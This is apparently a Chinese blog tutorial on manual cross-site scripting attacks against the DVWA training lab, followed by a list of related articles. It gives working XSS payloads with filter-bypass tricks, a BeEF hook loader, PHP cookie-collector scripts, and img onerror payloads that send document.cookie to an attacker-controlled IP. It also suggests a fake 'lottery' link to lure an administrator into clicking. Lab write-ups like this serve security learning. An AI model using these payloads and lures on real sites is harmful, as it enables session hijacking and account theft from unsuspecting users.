跨站脚本攻击之xss手动版

最新推荐文章于 2024-05-23 17:45:09 发布
最新推荐文章于 2024-05-23 17:45:09 发布
阅读量467 收藏
点赞数
文章标签: web xss javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47726676/article/details/116570908
版权

目录描述

定义

Cross-site scripting (XSS):跨站脚本是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。

类型

存储型(持久型)
跨站脚本可注入服务器的文件系统或数据库–引诱用户访问相关链接(貌似被用户信任的网站)–被攻击用户访问相关页面(采用特定URL参数)时,恶意代码下载到浏览器并执行。
反射型(非持久型)
跨站脚本包含在向网站提交内容的相关字段中–该字段将被服务器在返回页面中包含,相关字段中的跨站脚本将在浏览器端执行。–被攻击用户访问被精心设计的链接(貌似被用户信任的网站,参数被精心设计),服务器返回页面后相关恶意代码被执行。
DOM型
在客户端运行的JavaScript,会调用DOM(document object model文档对象模型)的内容–可将跨站脚本隐藏在DOM对象中,可让JS读到参数,却不传入服务端程序(如location.hash获取地址栏中’#’以后的部分)–被攻击用户访问被精心设计的链接,服务器返回页面后,执行JavaScript,调用被嵌入跨站脚本的DOM对象,相关恶意代码被执行

常用标签与js方法

标签

<iframe>
#iframe 元素会创建包含另外一个文档的内联框架(即行内框架)。

<textarea>
#标签定义多行的文本输入控件。
文本区中可容纳无限数量的文本,其中的文本的默认字体是等宽字体(通常是 Courier)。
可以通过 cols  rows 属性来规定 textarea 的尺寸

<img>
#嵌入一幅图片

<script>  
#用于定义客户端脚本,比如javascipt。
script元素既可以包含脚本语句,也可以通过src属性指向外部脚本文件。
必需的 type 属性规定脚本的 MIME 类型。
JavaScript 的常见应用时图像操作、表单验证以及动态内容更新。

js方法

alert
#用于显示带有一条指定消息和一个 OK 按钮的警告框。
语法
alert(message)

window.location
#用于获得当前页面的地址 (URL),并把浏览器重定向到新的页面。
window.location 对象在编写时可不使用 window 这个前缀。例如:
location.hostname 返回 web 主机的域名
location.pathname 返回当前页面的路径和文件名
location.port 返回 web 主机的端口 80  443
location.protocol 返回所使用的 web 协议(http:  https:)
location.href 返回当前页面的 URL
location.pathname 属性返回 URL 的路径名

onload
#onload 通常用于 <body> 元素,在页面完全载入后(包括图片、css文件等等。)执行脚本代码

onsubmit
#onsubmit 事件会在表单中的确认按钮被点击时发生

onerror
#当视频的媒体数据加载期间发生错误时执行

常见xss脚本

弹窗

<script>alert(1)</script>
<script>alert(document.cookie)</script>
<script>alert('xss')</script>

在这里插入图片描述

页面嵌套

<iframe src=http://www.baidu.com width=300 height=300></iframe>
<iframe src=http://www.baidu.com width=0 height=0 border=0></iframe>

在这里插入图片描述
页面重定向

<script>window.location="http://www.baidu.com"</script>

弹框警告并重定向(先弹窗再跳转)

<script>alert(1);window.location="http://www.baidu.com"</script>

访问恶意代码(结合BeEF)

<script src="http://192.168.72.145:3000/hook.js"></script>

在这里插入图片描述

low级别

DOM与反射性都是修改url,存储型在信息中放入xss脚本

reflected

源代码

if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

测试是否有xss漏洞

<scrpit>alert(1)</script>

产生弹窗
在这里插入图片描述
获得cookie

<script>alert(document.cookie)</script>

DOM

<?php
# No protections, anything goes
?>

在url中添加js脚本

http://10.12.202.19/dvwa/vulnerabilities/xss_d/?default=<script>alert(document.cookie)</script>

在这里插入图片描述

stored

在信息中插入xss脚本
在这里插入图片描述

medium级别

reflected

查看反射型的源代码,可以看出将<script>替换成""

if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
绕过方法

1)大小写绕过
<script>HTML标签,而HTML不区分大小写

<Script src="http://192.168.72.145:3000/hook.js"></Script>

2)双写组合过滤条件绕过

<scr<script>ipt>alert('sss')</script>

3)使用URL编码,规避”广谱“型script搜索

<img src="1" onerror="new Image().src= 'http://192.168.232.132/ge&#116_cookie.php?cookie=' + encodeURI(documen&#116.cookie);"></img>    
#把所有的’t’编码,但是可能在涉及数据库存储型XSS中不一定奏效

3)其他标签

<iframe src=http://www.baidu.com width=300 height=300></iframe>

<body onload=alert('xss')>

<a href='' onclick=alert('xss')>click</a>

</option></select><img src='' onerror=alert(1)>

DOM

直接过滤掉了<script>标签,用其他标签

<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];   
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

首先尝试<iframe src=http://www.baidu.com width=0 height=0 border=0>
发现语句嵌入到<select name="default">下的<option>
在这里插入图片描述
尝试闭合

</option></select><iframe src=http://www.baidu.com width=0 height=0 border=0>

在这里插入图片描述

可以看到代码插入到了页面中,但是没有弹窗,使用其他语句尝试
获取cookie

</option></select><svg/onload=alert(document.cookie)>

</option></select><img src='' onerror=alert(document.cookie)>

stored

源代码如下:

 <?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );
    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );
    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    //mysql_close();
}
?>

查看源代码,发现有如下函数

strip_tags(string) :函数剥去string字符串中的 HTML、XML 以及 PHP 的标签

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
预定义字符包括单引号(')双引号(")反斜杠(\)NULL

htmlspecialchars(string) 把预定义的字符 "<" (小于)、 ">" (大于)、& 、‘’、“” 转换为 HTML 实体,防止浏览器将其作为HTML元素

massage参数中有htmlspecialcharsstrip_tags,无法注入,而name只进行了<script>的过滤,因此进行name参数的注入
绕过方法同reflacted

high级别

reflacted

源代码


<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
?>

此关对<script>进行了严苛的过滤,但其他标签仍然能够使用,如:

<iframe src=http://www.baidu.com width=300 height=300></iframe>

<body onload=alert('xss')>

<a href='' onclick=alert('xss')>click</a>

</option></select><img src='' onerror=alert(document.cookie)>
方法二:

建立一个WEB站点,假定为192.168.5.129
WEB站点根目录下建立文件get_cookie.php
内容如下:

<?php

           $cookie=$_GET['cookie'];
	 		file_put_contents("cookie.txt","\n",FILE_APPEND);
           file_put_contents("cookie.txt",$cookie,FILE_APPEND);
?>

1)在dvwa XSS _r High 页面输入框中输入:

<img src="1" onerror="new Image().src = 'http://10.222.187.228/ge&#116_cookie.php?cookie=' + encodeURI(documen&#116.cookie);"></img>

2)地址栏中输入

http://10.12.202.51/dvwa/vulnerabilities/xss_r/?name=%3Cimg+src%3D%221%22+onerror%3D%22new+Image%28%29.src+%3D+%27http%3A%2F%2F10.222.187.228%2Fge%26%23116_cookie.php%3Fcookie%3D%27+%2B+encodeURI%28documen%26%23116.cookie%29%3B%22%3E%3C%2Fimg%3E#

其中10.12.202.51是dvwa的ip,192.1668.72.1是本地网站ip
**3)创建一个链接,指向get_cookie.php文件诱使管理员点击该快捷方式

http://10.12.202.51/dvwa/vulnerabilities/xss_r/?name=%3Cimg+src%3D%221%22+onerror%3D%22new+Image%28%29.src+%3D+%27http%3A%2F%2F10.222.187.228%2Fge%26%23116_cookie.php%3Fcookie%3D%27+%2B+encodeURI%28documen%26%23116.cookie%29%3B%22%3E%3C%2Fimg%3E#

http://10.222.187.228/1

<a href="http://10.222.187.228/1">点击此链接进行抽奖</a>

上述三种方法都能在网站目录下建立cookie.txt,并保存用户的cookie信息
第三种方法最隐蔽,但是可能是权限或者防火墙的问题,我第三种方法失败了
在这里插入图片描述

DOM

源代码如下:

<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}
?>

该题使用分支选择语句,要求只能在给定的分支选择,如果与给定的不匹配,就执行默认值
本题利用#来绕过,在url中#后边的内容不会发送到服务端,从而可以实现绕过。

#<script>alert(1)</script>

#<script>alert(document.cookie)</script>

#<script src="http://192.168.72.145:3000/hook.js"></script>

在这里插入图片描述

stored

<?php

if(isset($_POST['btnSign']))
{
   $message = trim($_POST['mtxMessage']);
   $name    = trim($_POST['txtName']);
   // Sanitize message input
   $message = stripslashes($message);
   $message = mysql_real_escape_string($message); 
   // Sanitize name input
   $name = mysql_real_escape_string($name);  
   $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";   
   $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );   
}
?>
方法一:

name只严格过滤了<script>,其他标签仍然可以注入
方法参照反射型
由于加载js代码必须使用script标签,因此在high级别下无法与BeEF建立连接

方法二:

在网站下建立index.php文件,内容如下:

<?php
$name = '1.jpg';
$fp = fopen($name, 'rb');

header("Content-Type: image/png");
header("Content-Length: " . filesize($name));

fpassthru($fp);
$c = $_GET["cookie"];
echo $c;
error_log($c ."". "\n",3,"cookie3.txt");
?>

站点根目录下再放一个1.jpg图片文件,任意图片均可。
启动burpsuite,设置浏览器代理为(127.0.0.1:8080),经过burp访问。
启动代理,在页面中任意输入,并上传,打开burp,将name中的内容替换为

<img src=x onerror="e=escape;this.src='//192.168.72.1/?cookie='%2b e(document.cookie)">

在这里插入图片描述

重新开启一个dvwa网页,进入high级别的存储型xss,可以在网站根目录下看到cookie3.txt,里面有cookie信息

JeremyHeria
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS跨站脚本攻击
01-27
跨站脚本(crosssitescript)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用的计算机安全漏洞,也是web最主流的攻击方式。那么什么是XSS呢?XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。XSS攻击的危害包括:1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力3、盗窃企业重要的具
新人burpxss漏洞poc 通用fuzz参数
yyyyxzj的博客
08-22 200
">XSSb={};{{{}.")));}}{{{}.")));{{{}.")));}}}}}}}}}}b={};{}.")));
BurpSuite测试上传文件xss漏洞教程
张小凡
02-07 925
本文将演示如何利用BurpSuite来构造文件上传引起的xss漏洞。
Burpxss自动化测试工具validator配置和使用教程
wutiangui的博客
08-03 672
另外可以根据自己的需要选择javascript functions的类型,我这里选择console.log。options的grep-match先清空原先的,然后add123456。Bapp store里搜索xss validator,然后安装它。以上上XSS测试的准备工作,接下来回到攻击模块开始attack。将xss.js和phantomjs.exe放在一起。就它了,先开启bp拦截,然后点击submit提交。123456下面有写1的就说明存在xss的。可以看到有XSS日志了,说明确实存在xss
BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)
m0_61869253的博客
02-21 1253
渗透测试(Penetrationtest)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透。Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。
xss2png:PNG IDAT块XSS有效负载生成器
05-04
xss2png 一个简单的工具,可以使用存储在PNG IDAT块XSS有效载荷生成PNG图像 非常感谢Nathaniel McHugh与我分享了他PHP源代码 用法 ~/$ python3 xss2png.py -p "[removed][removed]" -o xss.png ____ __ _____ ___|___ \ _ __ _ __ __ _ \ \/ / __/ __| __) | '_ \| '_ \ / _` | > <\__ \__ \/ __/| |_) | | | | (_| | /_/\_\___/___/_____| .__/|_| |_|\__, | |_| |_
burpsuite插件xssValidator的安装及使用(XSS自动扫描工具)
qq_50854662的博客
06-08 2197
burpsuit的Extender模板下,找到BApp Store,搜索XSS Validator,进行安装即可。xss.js是phantomJS检测xss漏洞的具体实现。下载完成后,将xss.js放在phantomjs同一个文件夹下。下载后配置环境变量,把bin目录下的这个exe加入环境变量。利用phantomjs运行xss.js。就可以看到XSS了!
安全服务面试题(XSS&文件上传)
qq_56895879的博客
02-27 568
所以黑盒怎么测试妮?先传一个正常图片,然后看看这个地方上传是否有用,然后再传一个jpg后缀的图片马,看看对内容会不会检测,然后再尝试改包,看看是不是前端验证,然后尝试下看看是黑名单还是白名单机制,然后最后尝试条件竞争。当然需要信息收集,信息收集web容器和用的动态语言和动态语言本对文件上传非常有用,一个ASP的站,你传一个PHP的马,如果说没有特殊设置,那么这个马是不可能执行(但是有些情况下,他设置了解析,也是可以解析的)然后web容器也会存在一些解析漏洞,如iis6.0畸形解析、CGI解析漏洞。
怎么把代码放图片里面进行注入_代码审计之旅
weixin_39926014的博客
11-30 1256
前言仅以本文记录暑假这些天在学习代码审计过程遇到的一些知识点,以及一些代码审计常用的方法,如果有什么不对的地方,也欢迎师傅们斧正,在下面讲解常见漏洞时,我会举一些例子,其包括部分小0day,如果有其他好玩的漏洞点,也希望师傅们能ddw。代码审计是什么由于我现在接触到的只有WEB层的代码审计,所以我个人的理解是对网站源码进行分析,从而找出攻击者可以利用的点。代码审计基本步骤当我拿到一份源码时,我...
DVWA系列(三)——使用Burpsuite进行反射型XSS(反射型跨站脚本攻击
橘子女侠
05-05 3781
1. XSS简介 (1)XSS(cross-site scripting) 跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击; XSS可以盗取客户端cookie,将客户端重定向到第三方网站; (2)客户端脚本语言 弹窗警告、广告; JavaScript; 在浏览器执行; (3)JavaScript 与J...
解析如何防止XSS跨站脚本攻击
01-31
这些规则适用于所有不同类别的XSS跨站脚本攻击,可以通过在服务端执行适当的解码来定位映射的XSS以及存储的XSS,由于XSS也存在很多特殊情况,因此强烈推荐使用解码库。另外,基于XSS的DOM也可以通过将这些规则运用在...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击-运维安全详细笔记
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
burpsuite靶场系列之客户端漏洞篇 - 跨站脚本(XSS)专题
weixin_50464560的博客
04-14 2959
https://www.anquanke.com/post/id/245953 本系列介绍 PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 客户端漏洞篇介绍 相对于服务器端漏洞篇,客户端漏洞篇会更加复杂
漏洞篇(XSS跨站脚本攻击二)
m0_58001548的博客
04-16 596
页面存在一个 p3 参数,type 类型为 hidden,闭合方式为双引号,所以 p3 为隐藏参数。我们使用 burpsuite 进行截断数据包进行分析。p3 的值为 hackme 我们直接插入代码这里必须使用">闭合,这样 XSS 代码才会被执行。
burpsuite检测xss漏洞
夜车星繁的博客
07-17 7541
burpsuite检测xss漏洞 XSS跨站脚本攻击)漏洞是Web应用程序最常见的漏洞之一,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的,比如获取用户的cookie,导航到恶意网站,携带木马等。根据其触发方式的不同,通常分为反射型XSS、存储型XSS和DOM-base型XSS。漏洞“注...
使用burpsuite进行自动化测试XSS漏洞的两种方法
Cwillchris的博客
07-08 1559
一、使用 burpsuite 进行自动化测试 XSS 漏洞我们使用之前搭建的DVWA靶机进行实验进入centos靶机,启动 apache 服务└─# systemctl start apache2进入kali拷贝 payload 字典到 root 目录下,字典可以使用 Kali 自带的,也可以使用网上找的└─# cp /usr/share/wordlists/wfuzz/Injections/XSS.txt /root在火狐访问: 192.168.98.66/DVWA-master/vulnerabil
BurpSuite工具系】使用BurpSuite一次完整的测试XSS漏洞
run_boy_2022的博客
07-21 1617
xss.js是phantomJS检测xss漏洞的具体实现,进入phantomjs-2.1.1-windows\bin目录打开cmd,执行 phantomjs.exe xss.js 命令设置监听。在Intruder的执行界面上,我们可以通过xss_result来查看payload的检测情况,那些响应报文存在漏洞标志的均被打√显示出来。开始后,可以看下我们之前phantomjs.exe xss.js 这个命令控制台是否有日志输出。便于我们从控制台观察结果。结果发现系统还是ok的,xss_bug列没有√。
XSS & CSRF 】访问时篡改密码——以DVWA-High为例
最新发布
Mr_Fmnwon的博客
05-23 955
第二阶段,增加了一个CSRF-Token。关于XSS的利用,cookie的泄露,在上述博客已很清晰地说明白了~从一开始无法利用,到思考需要的条件,一步步实现,对CSRF、XSS的理解更深了。唯一觉得遗憾的是,chat强大、解放编写代码门槛的同时,也让我编码能力——程序员的核心能力——迟滞不前甚至降低许多。。。唉。
跨站脚本攻击XSS
06-08
跨站脚本攻击(Cross-Site Scripting,简称 XSS)是一种常见的网络安全漏洞,攻击者利用输入输出不当的漏洞,将恶意脚本注入到网页,使得用户在访问网页时受到攻击。 XSS 攻击通常分为三种类型:反射型、存储型和 DOM 型。 反射型 XSS 攻击是通过构造恶意的 URL,将脚本注入到网页,当用户访问此 URL 时,就会触发攻击。这种攻击方式比较简单,但需要诱骗用户点击恶意链接才能实施攻击。 存储型 XSS 攻击是将恶意脚本存储在服务器端,当用户访问包含该脚本的页面时,就会触发攻击。这种攻击方式比较隐蔽,攻击者可以将恶意脚本存储在常用的网站或论坛上,等待用户访问并触发攻击。 DOM 型 XSS 攻击是将恶意脚本注入到网页的 DOM ,当用户浏览网页时,就会触发攻击。这种攻击方式比较难以防范,因为它不需要向服务器发送请求,而是直接在用户的浏览器执行恶意脚本。 为了防止 XSS 攻击,开发人员可以采取以下措施: 1. 对输入进行过滤和校验,禁止用户输入包含脚本的内容。 2. 对输出进行转义,将 HTML、CSS、JavaScript 等特殊字符转义为实体字符。 3. 使用 CSP(Content Security Policy)控制网页可以加载的资源,限制页面脚本执行和数据传输。 4. 使用 HttpOnly 属性设置 cookie,禁止 JavaScript 访问 cookie,防止攻击者窃取用户的凭证。 5. 及时修补漏洞,避免攻击者利用已知漏洞进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值